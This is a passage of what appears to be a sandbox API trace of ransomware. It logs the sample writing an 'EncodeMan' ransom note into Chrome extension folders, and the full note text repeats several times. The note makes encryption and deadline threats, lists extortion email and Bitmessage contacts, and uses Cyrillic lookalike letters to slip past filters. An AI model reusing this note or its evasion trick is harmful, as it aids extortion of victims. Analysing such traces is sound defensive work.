th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef4ad8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n5¼\x0b5Ø${ \x1c\x01y\x7f\x96\x15\x8eàwôß0\"", lpUsedDefaultChar=0x0) returned 8717 [0297.749] WriteFile (in: hFile=0x294, lpBuffer=0x1ef4ad8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef4ad8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0297.749] CloseHandle (hObject=0x294) returned 1 [0297.749] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_pt\\#readme_eman#.rtf")) returned 0xffffffff [0297.749] GetLastError () returned 0x2 [0297.749] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_pt\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0297.750] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.750] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK 